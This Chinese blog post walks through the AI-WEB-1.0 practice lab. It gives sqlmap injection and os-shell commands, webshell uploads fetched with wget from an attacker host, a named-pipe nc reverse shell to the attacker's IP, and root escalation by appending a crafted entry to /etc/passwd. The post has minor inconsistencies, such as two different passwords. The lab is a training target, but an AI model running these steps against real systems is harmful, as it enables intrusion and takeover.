AI-WEB-1.0超详细多方法教程

最新推荐文章于 2024-02-25 10:12:39 发布
最新推荐文章于 2024-02-25 10:12:39 发布
阅读量2.5k 收藏 9
点赞数 4
分类专栏: 靶机 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/127386541
版权

本文主要从情报收集开始,到漏洞攻击,再通过多方法拿到shell,提权。

攻击机1kali ip: 192.168.110.139

攻击机2win7 ip: 192.168.110.140

靶机AI-WEB-1.0 ip: ?

1.情报收集

1.c段扫描

使用arp-scan扫描

-l (扫描c段)

arp-scan -l

这里可以分析到靶机ip是192.168.110.138

2.对靶机进一步扫描

1.对端口进行扫描

使用nmap -sV -v -T4 对靶机扫描

 扫描发现只开放了80端口

2.对网页进一步扫描

 访问没有什么信息

使用dirb 对网页进一步扫描

dirb  "http://192.168.110.138/"

 

 尝试发现robots.txt中有内容

 访问发现/m3diNf0/不能正常访问 

/se3reTdir777/uploads/ 放回页面

 使用dirb 对/m3diNf0和/se3reTdir777扫描

 发现info.php访问

 发现是phpinfo的页面

再扫描se3reTdir777

dirb  "http://192.168.110.138/se3reTdir777"

 发现新的index.php 访问

 发现是查询页面 考虑sql注入

 

 输入’报错发现sql注入漏洞

2.漏洞利用

sqlmap的使用

这里利用burp抓包得到以下的包

POST /se3reTdir777/index.php HTTP/1.1
Host: 192.168.110.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://192.168.110.138
Connection: keep-alive
Referer: http://192.168.110.138/se3reTdir777/index.php
Upgrade-Insecure-Requests: 1

uid=1&Operation=Submit

通过抓包得到注入点uid=1&Operation=Submit

使用sqlmap

注入页面为http://192.168.110.138/se3reTdir777/index.php

注入点为uid=1&Operation=Submit

--dbs 列出数据库

sqlmap -u  "http://192.168.110.138/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

 得到了 

aiweb1

information_schema 两个数据库

-D 指定数据库 aiweb1

--tables 列出表名

sqlmap -u  "http://192.168.110.138/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

 得到 user systemUser 两个表名

再通过-T 指定表名user

--columns 列出字段

sqlmap -u  "http://192.168.110.138/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

 得到 firstName id lastName 3个字段

再-C 指定字段 id

--dump 获取字段中的数据

sqlmap -u  "http://192.168.110.138/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

 但是这里已经没有什么有用信息了

level  指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)

os-shell执行条件:

  • 网站必须是root权限
  • 网站的绝对路径已知
  • GPC为off
sqlmap -u  "http://192.168.110.138/se3reTdir777/index.php" -data "uid=1&Operation=Submit" --level=3 --os-shell

这里选择php 输入4

 选择2输入绝对路径

注这里知道m3diNf0和se3reTdir777 两个目录找绝对目录

这里有phpinfo 直接Ctrl + f  页面寻找 这两个目录

这里找到了路径 

    /home/www/html/web1x443290o2sdf92213/

我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

 这里成功进入shell

2.上传一句话木马

方法1:

通过sqlmap直接上传文件

在kali本地建立一句话木马

 

–file-write:去读取木马文件
–file-dest:后面加要存放文件的地址

sqlmap -u "http://192.168.110.138/se3reTdir777/index.php" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

 

 dir 发现文件

方法2

通过python 快速部署网页

sqlmap shell wget 直接下载

在kali 用

python -m SimpleHTTPServer  8888

快速开启网站端口为8888

 

 成功部署

wget http://192.168.110.139:8888/2.php

通过shell wget 下载文件

 

 发现才成功下载2.php

2.蚁剑连接

注 蚁剑连接为连接php可显示页面

这里 1.php 2.php 存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下

但是不能网页直接访问

 这里很多人被误导导致无法连接

正常路径在

http://192.168.110.138/se3reTdir777/uploads/1.php

访问是空白的使用蚁剑连接

 

 

 可以正常访问

这里蚁剑要拿到他的终端

 重点nc反弹连接

1.方法一 不再上传文件直接nc反弹

在kali nc 7777

-l 监听模式,用于入站连接

-v 详细输出--用两个-v可得到更详细的内容

-v 详细输出--用两个-v可得到更详细的内容

 nc -lvvp 7777

 

-e :将传入的信息以命令执行

这里用不了-e 使用其他方法

rm /tmp/z;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.139 7777 > /tmp/z

rm  删除文件 因为要保证没有/tmp/z 这个文件

mkfifo :创建一个FIFO特殊文件,是一个命名管道(可以用来做进程之间通信的桥梁)

 

成功连接但这个方法不稳定

2.方法2 上传nc连接脚本

 

 通过上传的两种方法的一种下载文件

在前php 启动他

 

 

提权

 

可以发现可以写入/etc/passwd

 

在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。

openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。

openssl passwd [option] passwd

openssl passwd常用的选项如下:

-1:表示采用的是MD5加密算法。

-salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。
创建用户

openssl passwd -1 -salt xuyun 123456

这里创建了用户 xuyun  密码为111111

同时与其/etc/passwd中的用户一样上传md5 加盐的hash

成功生成

 

查看一下root的写法

 

echo 'xuyun/$1$xuyun$fsOh5CMAyM7oRn6m894Sx/0:0:0::/root:/bin/bash'>>/etc/passwd

把root换成xuyun X 换成 $1$xuyun$fsOh5CMAyM7oRn6m894Sx0 其他一样写入passwd

 成功写入

这里直接切换会报错

所以先要用脚本提升为交互式shell,再切换用户: 

python -c 'import pty;pty.spawn("/bin/bash")'

 

 

许允er
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
智能家居:现代智能家居系统
02-05
方案综合智能屋 | | | | | 科 状态 主 开发者 注意! 该项目正在积极开发中。 总览 借助Smart Home软件包,您可以控制许多设备。 基于软件包Smart Home的分布式设备网络没有地理界限,并允许通过节点系统-微服务管理Internet上任何位置的设备。 您将能够与这些设备进行交互,就像它们在您的本地网络上一样。 通过灵活的脚本系统在配置器的Web界面中创建脚本和对事件的React。 该系统不需要与Internet的永久连接,它是完全自治的,并且不依赖外部服务。 正在开发的系统的基本原理是易于安装,内容成本低以及组件库的可访问性。 产品特点 最终的智能事物解决方案-
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 368
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
AI时代的Web开发:让Web开发更轻松
2301_81940605的博客
02-25 1225
人工智能(AI)具有改变我们生活的潜力,因为它可以接管那些单调、乏味的任务,这些工作通常会占用我们宝贵的时间和精力。
参赛-NXP家庭自动化智能网关设计-电路方案
04-20
欢迎下载研华科技主题白皮书: 【AIoT】研华AIoT边缘智能及网关解决方案 [摘要] 物联网、大数据、云服务与人工智能,是产业数位转型的关键科技趋势,透过创新应用,将替各产业带来巨大商机与全新 局面。研华以坚强的硬件实力为基础,开发出多元软件服务。 https://www.eefocus.com/resource/advantech/index.php?act=detail&item=1496 飞思卡尔功能丰富的联网智能网关参考设计基于高度灵活、多功能的低功率MPC8308 PowerQUICC:registered: II Pro处理器,可轻松支持广泛的相关应用,包括能源监控与管理、家庭自动化控制、家庭安全与监控、VoIP以及高清视频流。 MPC8308联网智能网关可通过易于使用的图形用户界面"随时随地" 的接入并控制来自智能手持设备的M2M链接。提供全面的HAN、WLAN和WAN连接,MPC8308-NSG包括: 一个集成式MPC13226 ZigBee:registered:无线基站、支持 Smart Energy 1.0和Home Automation 1.0的HAN配置以及智能插头和应用。 一个集成式802.11n 2x2 Wi-Fi模块,可提供过300 Mbps的WLAN性能 可通过线缆、DSL或3G/4G支持宽带WAN连接 如系统框图: 特性支持家庭安全与监控、 VoIP和HD视频流 具备灵活性和可扩展性,可同时运行各种应用 通过M2M链接"实现随时随地"的接入和控制 连接特性包括集成式802.11n 2x2 Wi-Fi模块,可提供过300 Mbps的WLAN性能,并通过线缆、DSL或3G/4G支持宽带WAN 整套飞思卡尔自有的OpenWrt软件(无需支付许可费用) 软件栈包括用于家庭检测和监控的NVR,以及HD视频流 NSG参考设计是一款可量产的产品,采用一个带有内部天线的低成本翻盖外壳。 图形用户界面,支持基于Web的M2M接入,并管理客户端设备和应用 电路原理图内容结构图: 原文出处:https://www.nxp.com/cn/products/software-and-tools/...
基于android的智能语音家居控制系统 安卓端1.0.zip
01-19
软件开发设计:PHP、QT、应用软件开发、系统软件开发、移动应用开发、网站开发C++、Java、python、web、C#等语言的项目开发与学习资料 硬件与设备:单片机、EDA、proteus、RTOS、包括计算机硬件、服务器、网络设备、存储设备、移动设备等 操作系统:LInux、IOS、树莓派、安卓开发、微机操作系统、网络操作系统、分布式操作系统等。此外,还有嵌入式操作系统、智能操作系统等。 网络与通信:数据传输、信号处理、网络协议、网络与通信硬件、网络安全网络与通信是一个非常广泛的领域,它涉及到计算机科学、电子工程、数学等多个学科的知识。 云计算与大数据:数据集、包括云计算平台、大数据分析、人工智能、机器学习等,云计算是一种基于互联网的计算方式,通过这种方式,共享的软硬件资源和信息可以按需提供给计算机和其他设备。
基于Qt的模拟多道批处理系统的两级调度 v1.0.zip
01-21
软件开发设计:PHP、QT、应用软件开发、系统软件开发、移动应用开发、网站开发C++、Java、python、web、C#等语言的项目开发与学习资料 硬件与设备:单片机、EDA、proteus、RTOS、包括计算机硬件、服务器、网络设备、存储设备、移动设备等 操作系统:LInux、IOS、树莓派、安卓开发、微机操作系统、网络操作系统、分布式操作系统等。此外,还有嵌入式操作系统、智能操作系统等。 网络与通信:数据传输、信号处理、网络协议、网络与通信硬件、网络安全网络与通信是一个非常广泛的领域,它涉及到计算机科学、电子工程、数学等多个学科的知识。 云计算与大数据:数据集、包括云计算平台、大数据分析、人工智能、机器学习等,云计算是一种基于互联网的计算方式,通过这种方式,共享的软硬件资源和信息可以按需提供给计算机和其他设备。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2376
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6104
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1321
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
AI-Web-1 靶场
weixin_65722679的博客
06-22 178
AI:web:1》靶场复现
云尘靶场-AI-Web-1.0
2202_75317918的博客
11-21 136
还是先用fscan来扫c段访问一下/robots.txt访问一下看看 ,不能访问删掉/upload输个1 试试1' 发现报错了这里我们可以发现是post传参,那么sqlmap执行POST注入的方式这里检查网络,看请求,可以看到传参放到sqlmap说明存在sql注入这里没有flag,也不懂有什么用访问另一个看看也是打不开,用dirsearch扫一下看看。
web-deep-learning-classifier:深度学习模型可对食物进行分类(Web App)
05-08
训练图像分类器和创建Web应用程序 我们的示例:食物图像分类器 引文注 如果您确实使用我们的博客或GitHub存储库来创建自己的Web或移动应用程序,如果您愿意通过共享以下引用来注明我们的工作归属,我们将不胜感激: Pattaniyil,Nindhin和Shaikh,Reshama, ,2019年 该项目由和共同完成。 以下内容用于模型训练(请参阅 ): fastai:版本1.0.42 PyTorch:版本1.0.0 Python:3.6版 以下用于模型部署: 赫鲁库 Flask:1.0版 目录 使用Fastai: :我们的Web应用程序为 部署移动应用程序,请参阅此存储库: 演示版
电子商务曼特斯外贸电子商务网站系统wmshop v1.0 B2B-mts-wmshov1.0.rar
04-07
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
[检测统计]X-Prober探针 v1.0_x-prober10.rar
最新发布
04-21
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
人工智能(AI)在未来的发展趋势和应用场景
kobekd8的博客
04-21 4283
因此,我们需要继续推动AI技术的发展,同时也需要制定相关的法律和政策来保护数据隐私和人类的利益。我们需要保持敏感和开放的心态,积极探索和应用AI技术,同时也需要考虑到人类的利益和社会的稳定。希望大家喜欢我的文章,我们下次再见!比如,未来的智能助手可以通过与人类的交互来更好地理解人类的需求和意图,并提供更加个性化的服务。比如,AI可以通过分析学生的学习数据来评估他们的学习进度和能力,并提供相应的教学内容和建议。- 更智能化:未来的AI将会越来越智能化和自适应,可以通过自我学习和适应来适应新的环境和任务。
AI Web 1靶机渗透实战-vuluhub系列(一)
PANDA墨森的博客
06-27 1187
这是vulnhub靶机系列文章的第一篇,接下来这段时间会分享曾经做过比较接近实战的靶机,把思路分享给大家... 靶机下载链接:https://www.vulnhub.com/entry/ai-web-1,353/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13172299.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机AI-web-1:192.168.136.142 #002 实战writeup 寻.
AI-WEB-2.0 靶机实录
gaopan2667002的博客
09-01 109
file_name=../../../../../../../../../../../../..//etc/apache2/.htpasswd获取到passwd文件。下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;这个文件告诉来访的搜索引擎哪些房间可以进入和参观,哪些房间因为存放贵重物品,或可能涉及住户及访客的隐私而不对搜索引擎开放。的内容时,才需要使用robots.txt文件。--从哪里获取到的这个apache文件的位置,为什么要获取该文件。
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 3660
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI-WEB-1.0
底层社会中的弱智
08-03 594
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
web3.0和web2.0的区别
02-07
它将使用人工智能技术,如机器学习和自然语言处理,来提供个性化的内容和服务。 - Web 3.0 更加强调数据隐私和安全。它将使用加密技术来保护用户的个人信息,并通过区块链技术来提供数据的可信性。 - Web 3.0 更加...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值